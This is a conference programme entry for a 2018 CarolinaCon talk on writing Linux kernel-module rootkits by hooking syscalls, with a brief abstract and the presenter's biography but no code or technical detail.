Kernel Mod Rootkits on Modern Linux Systems

Presented at CarolinaCon 14 (2018), April 14, 2018, 4 p.m. (60 minutes).

You can find a lot of primers with some Google-fu on writing Linux rootkits. Unfortunately most of them are outdated and have techniques that just don't work anymore. This talk will be specifically focused on writing a kernel mod rootkit on a modern Linux Kernel (the latest version of Linux Mint to be exact). It will specifically focus on hooking syscalls and how to do so in a simple, reproducible way. For this talk I'll be releasing a simple, but effective kernel mod rootkit and instructions on how to modify it for your own needs.


Presenters:

  • Alex Caceres
    Alejandro (Alex) Caceres is the founder and owner of Hyperion Gray, LLC, a small web security and software R&D company based in North Carolina. Alex attended Duke University, where he received a B.S. in both Physics and Mathematics and began working with distributed computing in the context of massive simulations of heavy ion collisions. A hacker and open source developer at heart, he worked as a computer network operations engineer and software developer at an information security consulting firm before starting Hyperion Gray in January 2013 with the release of his popular open source project PunkSPIDER (now punk.sh), which leverages distributed computing for mass-scale web vulnerability detection. Alex has extensive experience with web application hacking, penetration testing, and securing applications and systems against vulnerabilities. He has designed and taught several courses on these subjects, one of which has been published as an e-book and in print. He is currently the tech lead of Hyperion Gray's research team on the DARPA Memex project, and has been the tech lead on several other DARPA-funded projects as well. He has been a speaker and panel moderator at several major security conferences, including OWASP AppSec USA, ShmooCon, DEF CON, DerbyCon and CarolinaCon.

Links:

Similar Presentations: